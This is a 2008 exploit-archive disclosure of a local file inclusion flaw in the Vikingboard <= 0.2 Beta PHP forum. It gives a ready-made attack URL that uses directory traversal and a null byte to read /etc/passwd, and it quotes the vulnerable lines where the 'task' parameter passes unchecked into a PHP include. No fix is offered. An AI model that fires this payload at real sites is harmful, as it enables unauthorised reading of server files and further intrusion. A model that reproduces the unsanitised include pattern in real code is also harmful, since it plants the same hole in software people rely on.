:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.pl ] ####################################################################### # [ Vikingboard <= 0.2 Beta ] Local File Inclusion Vulnerability # ####################################################################### # # Script: "Vikingboard is a PHP-based discussion forum..." # # Script site: http://vikingboard.com/ # Download: http://sourceforge.net/projects/vboard/ # # Vuln: # http://site.com/[Vikingboard_0.2_Beta]/upload/index.php?act=task&task=./../../../../../../../etc/passwd%00 # # # Bug: ./Vikingboard_0.2_Beta/upload/index.php (lines: 81-91) # # ... # 81: switch(ifsetor($_GET['act'], false)) # 82: { # ... # 88: case 'task': # 89: require('./inc/lib/task_loader.php'); // (1) # 90: load_task(); // (2) # 91: break; # ... # # # Bug: ./Vikingboard_0.2_Beta/upload/inc/lib/task_loader.php (lines: 19-44) # # ... # 19: function load_task() # 20: { # ... # 27: if (!include("inc/tasks/task_{$_GET['task']}.php")) // (3) LFI # 28: { # 29: // Stop the script if the task does not exist # 30: die(); # 31: } # .... # 44: } # ... # # ############################################### # Greetz: D3m0n_DE * str0ke * and otherz.. ############################################### [ dun / 2008 ] ******************************************************************************************* # milw0rm.com [2008-09-25]